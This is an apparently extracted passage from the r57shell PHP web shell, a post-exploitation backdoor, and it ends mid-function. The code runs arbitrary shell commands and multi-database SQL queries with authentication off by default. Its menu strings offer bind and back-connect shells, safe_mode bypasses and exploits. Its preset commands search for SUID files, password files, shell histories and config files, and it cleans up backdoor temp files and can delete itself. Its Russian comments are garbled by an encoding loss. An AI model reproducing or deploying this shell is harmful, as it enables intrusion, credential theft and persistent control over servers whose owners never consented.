You are on page 1of 41

<?

php
/*********************************************************************************
*********************/
/*
/* # # # #
/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - ������ �� ��� ���������� ��� �������� ���� ������� �� �������
����� �������
/* �� ������ ������� ���� ����� �� ����� �����: http://rst.void.ru
/* �����: 1.23
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* rst/ghc http://rst.void.ru , http://ghc.ru
/* any modified republishing is restricted
/*********************************************************************************
*********************/

/* ~~~ ��������� ~~~ */


error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.23";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_post = &$http_post_vars;
$_get = &$http_get_vars;
$_server = &$http_server_vars;
}
if (@get_magic_quotes_gpc())
{
foreach ($_post as $k=>$v)
{
$_post[$k] = stripslashes($v);
}
foreach ($_server as $k=>$v)
{
$_server[$k] = stripslashes($v);
}
}

/* ~~~ ������������� ~~~ */

// $auth = 1; - ������������� �������


// $auth = 0; - ������������� ��������
$auth = 0;

// ����� � ������ �� ������� � �������


// �� �������� ������� ����� ����������� �� �������!!!
$name='r57'; // ����� �����������
$pass='r57'; // ������ �����������

if($auth == 1) {
if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name ||
$_server['php_auth_pw']!==$pass)
{
header('www-authenticate: basic realm="r57shell"');
header('http/1.0 401 unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : access denied</b>");
}
}
$head = '<!-- ���������� ��� -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251">

<style>
tr {
border-right: #aaaaaa 1px solid;
border-top: #eeeeee 1px solid;
border-left: #eeeeee 1px solid;
border-bottom: #aaaaaa 1px solid;
}
td {
border-right: #aaaaaa 1px solid;
border-top: #eeeeee 1px solid;
border-left: #eeeeee 1px solid;
border-bottom: #aaaaaa 1px solid;
}
.table1 {
border-right: #cccccc 0px;
border-top: #cccccc 0px;
border-left: #cccccc 0px;
border-bottom: #cccccc 0px;
background-color: #d4d0c8;
}
.td1 {
border-right: #cccccc 0px;
border-top: #cccccc 0px;
border-left: #cccccc 0px;
border-bottom: #cccccc 0px;
font: 7pt verdana;
}
.tr1 {
border-right: #cccccc 0px;
border-top: #cccccc 0px;
border-left: #cccccc 0px;
border-bottom: #cccccc 0px;
}
table {
border-right: #eeeeee 1px outset;
border-top: #eeeeee 1px outset;
border-left: #eeeeee 1px outset;
border-bottom: #eeeeee 1px outset;
background-color: #d4d0c8;
}
input {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: 8pt verdana;
}
select {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: 8pt verdana;
}
submit {
border-right: buttonhighlight 2px outset;
border-top: buttonhighlight 2px outset;
border-left: buttonhighlight 2px outset;
border-bottom: buttonhighlight 2px outset;
background-color: #e4e0d8;
width: 30%;
}
textarea {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: fixedsys bold;
}
body {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
a:link {color:red; text-decoration: none}
a:visited { color:red; text-decoration: none}
a:active {color:red; text-decoration: none}
a:hover {color:blue;text-decoration: none}
</style>';
if(isset($_get['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font
face=verdana size=-2><b>[ <a href=".$_server['php_self'].">back</a> ]
</b></font></div>"; die(); }
if ($_post['cmd']=="db_query")
{
echo $head;
switch($_post['db'])
{
case 'mysql':
if(empty($_post['db_port'])) { $_post['db_port'] = '3306'; }
$db =
@mysql_connect('localhost:'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
if(!empty($_post['mysql_db'])) { @mysql_select_db($_post['mysql_db'],$db); }
$querys = @explode(';',$_post['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=verdana size=-2 color=green><b>query#".$num." :
".htmlspecialchars($query)."</b></font><br>";
$res = @mysql_query($query,$db);
$error = @mysql_error($db);
if($error) { echo "<table width=100%><tr><td><font face=verdana size=-
2>error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@mysql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mysql_fetch_assoc($res)))
{
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font
face=verdana size=-2><b>&nbsp;", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode("&nbsp;</font></td><td><font face=verdana size=-
2>&nbsp;",$values);
$sql2 .= "<tr><td><font face=verdana size=-
2>&nbsp;".$values."&nbsp;</font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=verdana size=-
2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table
width=100%><tr><td><font face=verdana size=-2>affected rows :
<b>".$rows."</b></font></td></tr></table><br>"; } }
}
@mysql_free_result($res);
}
}
@mysql_close($db);
}
else echo "<div align=center><font face=verdana size=-2 color=red><b>can't
connect to mysql server</b></font></div>";
break;
case 'mssql':
if(empty($_post['db_port'])) { $_post['db_port'] = '1433'; }
$db =
@mssql_connect('localhost,'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }
$querys = @explode(';',$_post['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=verdana size=-2 color=green><b>query#".$num." :
".htmlspecialchars($query)."</b></font><br>";
$res = @mssql_query($query,$db);
if (@mssql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mssql_fetch_assoc($res)))
{
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font
face=verdana size=-2><b>&nbsp;", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode("&nbsp;</font></td><td><font face=verdana size=-
2>&nbsp;",$values);
$sql2 .= "<tr><td><font face=verdana size=-
2>&nbsp;".$values."&nbsp;</font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=verdana size=-
2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
/* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table
width=100%><tr><td><font face=verdana size=-2>affected rows :
<b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table
width=100%><tr><td><font face=verdana size=-2>error :
<b>".$error."</b></font></td></tr></table><br>"; }} */
@mssql_free_result($res);
}
}
@mssql_close($db);
}
else echo "<div align=center><font face=verdana size=-2 color=red><b>can't
connect to mssql server</b></font></div>";
break;
case 'postgresql':
if(empty($_post['db_port'])) { $_post['db_port'] = '5432'; }
$str = "host='localhost' port='".$_post['db_port']."'
user='".$_post['mysql_l']."' password='".$_post['mysql_p']."'
dbname='".$_post['mysql_db']."'";
$db = @pg_connect($str);
if($db)
{
$querys = @explode(';',$_post['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=verdana size=-2 color=green><b>query#".$num." :
".htmlspecialchars($query)."</b></font><br>";
$res = @pg_query($db,$query);
$error = @pg_errormessage($db);
if($error) { echo "<table width=100%><tr><td><font face=verdana size=-
2>error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@pg_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @pg_fetch_assoc($res)))
{
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font
face=verdana size=-2><b>&nbsp;", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode("&nbsp;</font></td><td><font face=verdana size=-
2>&nbsp;",$values);
$sql2 .= "<tr><td><font face=verdana size=-
2>&nbsp;".$values."&nbsp;</font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=verdana size=-
2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table
width=100%><tr><td><font face=verdana size=-2>affected rows :
<b>".$rows."</b></font></td></tr></table><br>"; } }
}
@pg_free_result($res);
}
}
@pg_close($db);
}
else echo "<div align=center><font face=verdana size=-2 color=red><b>can't
connect to postgresql server</b></font></div>";
break;
case 'oracle':
$db = @ocilogon($_post['mysql_l'], $_post['mysql_p'], $_post['mysql_db']);
if(($error = @ocierror())) { echo "<div align=center><font face=verdana size=-2
color=red><b>can't connect to oracle
server.<br>".$error['message']."</b></font></div>"; }
else
{
$querys = @explode(';',$_post['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5) {
echo "<font face=verdana size=-2 color=green><b>query#".$num." :
".htmlspecialchars($query)."</b></font><br>";
$stat = @ociparse($db, $query);
@ociexecute($stat);
if(($error = @ocierror())) { echo "<table width=100%><tr><td><font
face=verdana size=-2>error :
<b>".$error['message']."</b></font></td></tr></table><br>"; }
else
{
$rowcount = @ocirowcount($stat);
if($rowcount != 0) {echo "<table width=100%><tr><td><font face=verdana size=-
2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
else {
echo "<table width=100%><tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td
bgcolor=#cccccc><font face=verdana size=-
2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>";
}
echo "</tr>";
while(ocifetch($stat))
{
echo "<tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=verdana
size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
echo "</tr>";
}
echo "</table><br>";
}
@ocifreestatement($stat);
}
}
}
@ocilogoff($db);
}
break;
}
echo "<form name=form method=post>";
echo in('hidden','db',0,$_post['db']);
echo in('hidden','db_port',0,$_post['db_port']);
echo in('hidden','mysql_l',0,$_post['mysql_l']);
echo in('hidden','mysql_p',0,$_post['mysql_p']);
echo in('hidden','mysql_db',0,$_post['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center><textarea cols=65 rows=10
name=db_query>".(!empty($_post['db_query'])?($_post['db_query']):("show
databases;\nselect * from user;"))."</textarea><br><input type=submit name=submit
value=\" run sql query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>"; die();
}
if(isset($_get['delete']))
{
@unlink(@substr(@strrchr($_server['php_self'],"/"),1));
}
if(isset($_get['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_get['phpini']))
{
echo $head;
function u_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'true' : 'false';
if ($value === null) return 'null';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return u_wordwrap((string) $value);
}
function u_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=verdana size=-2
color=red><div align=center><b>directive</b></div></font></td><td
bgcolor=#cccccc><font face=verdana size=-2 color=red><div align=center><b>local
value</b></div></font></td><td bgcolor=#cccccc><font face=verdana size=-2
color=red><div align=center><b>master value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.$key.'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.u_value($value['local_value']).'</b></div></font></td><td><font
face=verdana size=-2><div
align=center><b>'.u_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
if(isset($_get['cpu']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-2 color=red><b>cpu</b></font></div></td></tr></table><table
width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.trim($info[0]).'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=verdana size=-2><b> ---
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
if(isset($_get['mem']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-2 color=red><b>memory</b></font></div></td></tr></table><table
width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.trim($info[0]).'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=verdana size=-2><b> ---
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
/*
����� �����
$language='ru' - �������
$language='eng' - ����������
*/
$language='ru';
$lang=array(
'ru_text1' =>'���������� �������',
'ru_text2' =>'���������� ������ �� �������',
'ru_text3' =>'��������� �������',
'ru_text4' =>'������ ���������',
'ru_text5' =>'�������� ������ �� ������',
'ru_text6' =>'��������� ����',
'ru_text7' =>'������',
'ru_text8' =>'�������� �����',
'ru_butt1' =>'���������',
'ru_butt2' =>'���������',
'ru_text9' =>'�������� ����� � ������� ��� � /bin/bash',
'ru_text10'=>'������� ����',
'ru_text11'=>'������ �� �������',
'ru_butt3' =>'�������',
'ru_text12'=>'back-connect',
'ru_text13'=>'ip-�����',
'ru_text14'=>'����',
'ru_butt4' =>'���������',
'ru_text15'=>'�������� ������ � ���������� �������',
'ru_text16'=>'������������',
'ru_text17'=>'��������� ����',
'ru_text18'=>'��������� ����',
'ru_text19'=>'exploits',
'ru_text20'=>'������������',
'ru_text21'=>'����� ��',
'ru_text22'=>'datapipe',
'ru_text23'=>'��������� ����',
'ru_text24'=>'��������� ����',
'ru_text25'=>'��������� ����',
'ru_text26'=>'������������',
'ru_butt5' =>'���������',
'ru_text28'=>'������ � safe_mode',
'ru_text29'=>'������ ��������',
'ru_butt6' =>'�������',
'ru_text30'=>'�������� �����',
'ru_butt7' =>'�������',
'ru_text31'=>'���� �� ������',
'ru_text32'=>'���������� php ����',
'ru_text33'=>'�������� ����������� ������ ����������� open_basedir ����� �������
curl',
'ru_butt8' =>'���������',
'ru_text34'=>'�������� ����������� ������ ����������� safe_mode ����� ������
include',
'ru_text35'=>'�������� ����������� ������ ����������� safe_mode ����� ��������
����� � mysql',
'ru_text36'=>'����',
'ru_text37'=>'�����',
'ru_text38'=>'������',
'ru_text39'=>'�������',
'ru_text40'=>'���� ������� ���� ������',
'ru_butt9' =>'����',
'ru_text41'=>'��������� � �����',
'ru_text42'=>'�������������� �����',
'ru_text43'=>'������������� ����',
'ru_butt10'=>'���������',
'ru_butt11'=>'�������������',
'ru_text44'=>'�������������� ����� ����������! ������ ������ �� �����!',
'ru_text45'=>'���� ��������',
'ru_text46'=>'�������� phpinfo()',
'ru_text47'=>'�������� �������� php.ini',
'ru_text48'=>'�������� ��������� ������',
'ru_text49'=>'�������� ������� � �������',
'ru_text50'=>'��������� � ����������',
'ru_text51'=>'��������� � �����',
'ru_text52'=>'����� �� ������',
'ru_text53'=>'������ � �����',
'ru_text54'=>'����� ������ � ������',
'ru_butt12'=>'�����',
'ru_text55'=>'������ � ������',
'ru_text56'=>'������ �� �������',
'ru_text57'=>'�������/������� ����/���������',
'ru_text58'=>'��',
'ru_text59'=>'����',
'ru_text60'=>'���������',
'ru_butt13'=>'�������/�������',
'ru_text61'=>'���� ������',
'ru_text62'=>'��������� �������',
'ru_text63'=>'���� ������',
'ru_text64'=>'��������� �������',
'ru_text65'=>'�������',
'ru_text66'=>'�������',
'ru_text67'=>'chown/chgrp/chmod',
'ru_text68'=>'�������',
'ru_text69'=>'��������1',
'ru_text70'=>'��������2',
'ru_text71'=>"������ �������� �������:\r\n- �� chown - �� ������ ����������� ���
��� uid (������) \r\n- �� ������� CHGrp - �� ������ ��� gid (������) \r\n- ��
������� CHMod - ����� ����� � ������������ ������������� (�������� 0777)",
'ru_text72'=>'����� �� ������',
'ru_text73'=>'������ � �����',
'ru_text74'=>'������ � ������',
'ru_text75'=>'* ����� ������������ ��������� ���������',
'ru_text76'=>'����� ������ � ������ � ������ ������� find',
'ru_text77'=>'�������� ��������� ���� ������',
'ru_text78'=>'���������� �������',
'ru_text79'=>'���������� �������',
'ru_text80'=>'���',
'ru_text81'=>'����',
'ru_text82'=>'���� ������',
'ru_text83'=>'���������� sql �������',
'ru_text84'=>'sql ������',
'ru_text85'=>'�������� ����������� ������ ����������� safe_mode ����� ����������
������ � Mssql �������',
/* --------------------------------------------------------------- */
'eng_text1' =>'executed command',
'eng_text2' =>'execute command on server',
'eng_text3' =>'run command',
'eng_text4' =>'work directory',
'eng_text5' =>'upload files on server',
'eng_text6' =>'local file',
'eng_text7' =>'aliases',
'eng_text8' =>'select alias',
'eng_butt1' =>'execute',
'eng_butt2' =>'upload',
'eng_text9' =>'bind port to /bin/bash',
'eng_text10'=>'port',
'eng_text11'=>'password for access',
'eng_butt3' =>'bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'ip',
'eng_text14'=>'port',
'eng_butt4' =>'connect',
'eng_text15'=>'upload files from remote server',
'eng_text16'=>'with',
'eng_text17'=>'remote file',
'eng_text18'=>'local file',
'eng_text19'=>'exploits',
'eng_text20'=>'use',
'eng_text21'=>'&nbsp;new name',
'eng_text22'=>'datapipe',
'eng_text23'=>'local port',
'eng_text24'=>'remote host',
'eng_text25'=>'remote port',
'eng_text26'=>'use',
'eng_butt5' =>'run',
'eng_text28'=>'work in safe_mode',
'eng_text29'=>'access denied',
'eng_butt6' =>'change',
'eng_text30'=>'cat file',
'eng_butt7' =>'show',
'eng_text31'=>'file not found',
'eng_text32'=>'eval php code',
'eng_text33'=>'test bypass open_basedir with curl functions',
'eng_butt8' =>'test',
'eng_text34'=>'test bypass safe_mode with include function',
'eng_text35'=>'test bypass safe_mode with load file in mysql',
'eng_text36'=>'database',
'eng_text37'=>'login',
'eng_text38'=>'password',
'eng_text39'=>'table',
'eng_text40'=>'dump database table',
'eng_butt9' =>'dump',
'eng_text41'=>'save dump in file',
'eng_text42'=>'edit files',
'eng_text43'=>'file for edit',
'eng_butt10'=>'save',
'eng_text44'=>'can\'t edit file! only read access!',
'eng_text45'=>'file saved',
'eng_text46'=>'show phpinfo()',
'eng_text47'=>'show variables from php.ini',
'eng_text48'=>'delete temp files',
'eng_butt11'=>'edit file',
'eng_text49'=>'delete script from server',
'eng_text50'=>'view cpu info',
'eng_text51'=>'view memory info',
'eng_text52'=>'find text',
'eng_text53'=>'in dirs',
'eng_text54'=>'find text in files',
'eng_butt12'=>'find',
'eng_text55'=>'only in files',
'eng_text56'=>'nothing :(',
'eng_text57'=>'create/delete file/dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'create/delete',
'eng_text61'=>'file created',
'eng_text62'=>'dir created',
'eng_text63'=>'file deleted',
'eng_text64'=>'dir deleted',
'eng_text65'=>'create',
'eng_text66'=>'delete',
'eng_text67'=>'chown/chgrp/chmod',
'eng_text68'=>'command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"second commands param is:\r\n- for chown - name of new owner or
uid\r\n- for chgrp - group name or gid\r\n- for chmod - 0777, 0755...",
'eng_text72'=>'text for find',
'eng_text73'=>'find in folder',
'eng_text74'=>'find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'search text in files via find',
'eng_text77'=>'show database structure',
'eng_text78'=>'show tables',
'eng_text79'=>'show columns',
'eng_text80'=>'type',
'eng_text81'=>'net',
'eng_text82'=>'databases',
'eng_text83'=>'run sql query',
'eng_text84'=>'sql query',
);
/*
������ ������
�������� �������� ������������� ������ ����� � ���-�� ������. ( ������� ��������
���� ��������� ���� )
�� ������ ���� �������� ��� ������� �������.
*/
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'---------------------------------------------------------------------------------
-------------------'=>'ls -la'
);
$table_up1 = "<tr><td bgcolor=#cccccc><font face=verdana size=-2><b><div
align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>";
$arrow = " <font face=wingdings color=gray>�</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=post>";
$fe = "</form>";

if (!empty($_post['dir'])) { @chdir($_post['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
if(empty($dir))
{
$os = getenv('os');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
{
if(@eregi("^win",$os)) { $windows = 1; }
else { $unix = 1; }
}
}
if(!empty($_post['s_dir']) && !empty($_post['s_text']) && !empty($_post['cmd']) &&
$_post['cmd'] == "search_text")
{
echo $head;
if(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new
searchresult($_post['s_dir'],$_post['s_text'],$_post['s_mask']); }
else { $sr = new searchresult($_post['s_dir'],$_post['s_text']); }
$sr->searchtext(0,0);
$res = $sr->getresultfiles();
$found = $sr->getmatchescount();
$titles = $sr->gettitles();
$r = "";
if($found > 0)
{
$r .= "<table width=100%>";
foreach($res as $file=>$v)
{
$r .= "<tr>";
$r .= "<td colspan=2><font face=verdana size=-2><b>".ws(3);
$r .= ($windows)? str_replace("/","\\",$file) : $file;
$r .= "</b></font></ td>";
$r .= "</tr>";
foreach($v as $a=>$b)
{
$r .= "<tr>";
$r .= "<td align=center><b><font face=verdana size=-
2>".$a."</font></b></td>";
$r .= "<td><font face=verdana size=-2>".ws(2).$b."</font></td>";
$r .= "</tr>\n";
}
}
$r .= "</table>";
echo $r;
}
else
{
echo "<p align=center><b><font face=verdana size=-
2>".$lang[$language.'_text56']."</b></font></p>";
}
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
if($windows&&!$safe_mode)
{
$uname = ex("ver");
if(empty($uname)) { $safe_mode = 1; }
}
else if($unix&&!$safe_mode)
{
$uname = ex("uname");
if(empty($uname)) { $safe_mode = 1; }
}
$server_software = getenv('server_software');
if(empty($server_software)){ $server_software = "-"; }
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function we($i)
{
if($globals['language']=="ru"){ $text = '������! �� ���� �������� � ���� '; }
else { $text = "[-] error! can't write in file "; }
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font
color=red face=verdana size=-2><div
align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function re($i)
{
if($globals['language']=="ru"){ $text = '������! �� ���� ��������� ���� '; }
else { $text = "[-] error! can't read file "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#cccccc><font color=red face=verdana size=-2><div
align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function ce($i)
{
if($globals['language']=="ru"){ $text = "�� ������� ������� "; }
else { $text = "can't create "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#cccccc><font color=red face=verdana size=-2><div
align=center><b>".$text.$i."</b></div></font></td></tr></table>";
return null;
}
function perms($mode)
{
if ($globals['windows']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xa000 ) { $type='l'; }
else if( $mode & 0xc000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 's';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 's';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 't';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value)
{
$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\">";
return $ret;
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or we($fname);
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}
}
function sr($l,$t1,$t2)
{
